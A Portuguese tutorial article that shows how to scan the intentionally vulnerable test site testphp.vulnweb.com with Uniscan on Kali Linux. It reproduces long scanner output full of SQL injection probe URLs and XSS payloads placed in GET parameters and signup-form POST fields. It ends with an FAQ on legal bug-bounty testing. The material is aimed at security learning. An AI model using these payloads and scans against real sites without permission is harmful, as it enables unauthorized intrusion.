Como Achar Vulnerabilidades em Sites: Guia Completo com Ferramentas e Técnicas

Descobrir vulnerabilidades em sites é um fator muito simples, com alguns conhecimentos técnicos em ferramentas como, por exemplo, Uniscan e SQL Injection, você estará apto para procurar vulnerabilidades em sites.

Com base neste tema, tive a ideia de criar este artigo para ensinar técnicas de ataques que são muito utilizadas para encontrar vulnerabilidades em sites.

As técnicas demonstradas aqui são baseadas em ataques web, onde os testes serão aplicados principalmente em vulnerabilidade de sites PHP. Vamos aplicar os testes sobre o site "Testphp.Vulnweb", onde temos a total permissão para realizarmos este tipo de testes, pois o mesmo foi criado com este objetivo: desafiar, ensinar e motivar profissionais de segurança da informação a encontrar falhas em suas aplicações.

Para esta exploração, é importante ressaltar que está sendo usada a distribuição Debian "Kali Linux" e mais duas ferramentas super importantes que já vêm pré-instaladas por padrão no Kali.

• Uniscan: Uma poderosa ferramenta de scanner de vulnerabilidade web que procura falhas comuns como, por exemplo, inclusão de arquivos locais, execução de comandos remotos, arquivos remotos, SQL Injection. Também é capaz de identificar e enumerar serviços web, arquivos e diretórios interessantes, e informações do servidor.
• SqlMap: Ferramenta open source para teste de penetração que automatiza o processo de detecção e exploração de vulnerabilidades a Injeção de SQL. Este software, bastante conhecido, é utilizado geralmente por crackers para invadir bancos de dados SQL.

Uniscan – Ferramenta de Teste de Penetração Web

No terminal do Kali, digite o comando "uniscan --help", que retornará as funcionalidades de cada comando:

root@Kali2018-4:~# uniscan --help
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
OPTIONS:
-h help
-u <url> example: https://www.example.com/
-f <file> list of url's
-b Uniscan go to background
-q Enable Directory checks
-w Enable File checks
-e Enable robots.txt and sitemap.xml check
-d Enable Dynamic checks
-s Enable Static checks
-r Enable Stress checks
-i <dork> Bing search
-o <dork> Google search
-g Web fingerprint
-j Server fingerprint
usage:
[1] perl ./uniscan.pl -u http://www.example.com/ -qweds
[2] perl ./uniscan.pl -f sites.txt -bqweds
[3] perl ./uniscan.pl -i uniscan
[4] perl ./uniscan.pl -i "ip:xxx.xxx.xxx.xxx"
[5] perl ./uniscan.pl -o "inurl:test"
[6] perl ./uniscan.pl -u https://www.example.com/ -r

Como Encontrar Vulnerabilidades em Sites com Uniscan

Em seguida, digite o comando "uniscan -u http://testphp.vulnweb.com/ -qweds" para que a ferramenta realize o checkup geral de vulnerabilidades na aplicação. Esta ferramenta vai te ajudar a como descobrir vulnerabilidades em sites.

root@Kali2018-4:~# uniscan -u http://testphp.vulnweb.com/ -qweds
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
Scan date: 10-2-2020 20:45:18
===================================================================================================
| Domain: http://testphp.vulnweb.com/
| Server: nginx/1.4.1
| IP: 176.28.50.165
===================================================================================================
|
| Directory check:
| [+] CODE: 200 URL: http://testphp.vulnweb.com/Flash/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/admin/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/images/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/pictures/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/secured/
===================================================================================================
|
| File check:
| [+] CODE: 200 URL: http://testphp.vulnweb.com/CVS/Entries
| [+] CODE: 200 URL: http://testphp.vulnweb.com/favicon.ico
| [+] CODE: 200 URL: http://testphp.vulnweb.com/index.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/login.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/search.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/userinfo.php?uid=1;
===================================================================================================
|
| Check robots.txt:
|
| Check sitemap.xml:
===================================================================================================
|
| Crawler Started:
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: FCKeditor upload test v.1 Loaded.
| [+] Crawling finished, 87 URL's found!
|
| E-mails:
| [+] E-mail Found: wvs@acunetix.com
|
| File Upload Forms:
|
| Timthumb:
|
| External hosts:
| [+] External Host Found: http://www.eclectasy.com
| [+] External Host Found: http://www.acunetix.com
| [+] External Host Found: https://www.acunetix.com
| [+] External Host Found: http://blog.mindedsecurity.com
|
| PHPinfo() Disclosure:
|
| Web Backdoors:
|
| Source Code Disclosure:
| [+] Source Code Found: http://testphp.vulnweb.com/pictures/wp-config.bak
|
| FCKeditor File Upload:
|
| Ignored Files:
| http://testphp.vulnweb.com/Flash/add.fla
| http://testphp.vulnweb.com/admin/create.sql
===================================================================================================
| Dynamic tests:
| Plugin name: Learning New Directories v.1.2 Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2 Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+] 4 New directories added
|
|
| FCKeditor tests:
| Timthumb < 1.33 vulnerability:
| Backup Files:
| Blind SQL Injection:
| Local File Include:
| PHP CGI Argument Injection:
| Remote Command Execution:
| Remote File Include:
| SQL Injection:
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1'
[*] Remaining tests: 96
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1"
[*] Remaining tests: 95
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2'
[*] Remaining tests: 94
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2"
[*] Remaining tests: 93
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3'
[*] Remaining tests: 92
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3"
[*] Remaining tests: 91
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4'
[*] Remaining tests: 90
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4"
[*] Remaining tests: 89
[*] Remaining tests: 88
[*] Remaining tests: 87
[*] Remaining tests: 86
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1'
[*] Remaining tests: 85
[*] Remaining tests: 84
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1"
[*] Remaining tests: 83
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2"
[*] Remaining tests: 82
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2'
[*] Remaining tests: 81
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3'
[*] Remaining tests: 80
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3"
| [+] Vul [SQL-i] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123'&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><script>alert('XSS')</script>
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><IMG SRC="javascript:alert('XSS');">
[*] Remaining tests: 283
[*] Remaining tests: 282
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
[*] Remaining tests: 281
[*] Remaining tests: 280
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
[*] Remaining tests: 279
[*] Remaining tests: 278
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
[*] Remaining tests: 277
[*] Remaining tests: 276
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><body onload="javascript:alert('XSS')"></body> 
[*] Remaining tests: 275
[*] Remaining tests: 274
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><table background="javascript:alert('XSS')"></table>
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<script>alert('XSS')</script>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 163
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<IMG SRC="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<body onload="javascript:alert('XSS')"></body>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<table background="javascript:alert('XSS')"></table>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<script>alert('XSS')</script>&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<IMG SRC="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 136
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 135
[*] Remaining tests: 134
[*] Remaining tests: 133
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<body onload="javascript:alert('XSS')"></body>&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 132
[*] Remaining tests: 131
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<table background="javascript:alert('XSS')"></table>&uemail=123&uphone=123&signup=123&uaddress=123 
[*] Remaining tests: 130
[*] Remaining tests: 129
[*] Remaining tests: 128
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<script>alert('XSS')</script>&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 127
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<IMG SRC="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 126
[*] Remaining tests: 125
[*] Remaining tests: 124
[*] Remaining tests: 123
[*] Remaining tests: 122
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 121
[*] Remaining tests: 119
[*] Remaining tests: 119
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123

Perguntas Frequentes sobre Vulnerabilidades em Sites

O que são vulnerabilidades em sites?

Vulnerabilidades em sites são falhas ou brechas na programação, configuração ou design de uma aplicação web que podem ser exploradas por invasores para obter acesso não autorizado, roubar dados ou comprometer a segurança do sistema. Isso inclui problemas como SQL Injection e Cross-Site Scripting (XSS).

Quais ferramentas posso usar para encontrar vulnerabilidades?

Para iniciantes, ferramentas como Uniscan e Sqlmap (mencionadas neste artigo) são excelentes pontos de partida, especialmente se você utiliza distribuições como Kali Linux. Existem também outras soluções, como OWASP ZAP e Burp Suite, que oferecem recursos mais avançados para testes de penetração.

É legal procurar por vulnerabilidades em sites?

É legal e incentivado procurar por vulnerabilidades em sites se você tiver permissão explícita do proprietário do site. Muitos programas de bug bounty e plataformas como "Hacker One" permitem que pesquisadores de segurança testem sistemas em busca de falhas. Sempre verifique a política de divulgação de vulnerabilidades (VDP) de um site antes de realizar qualquer teste.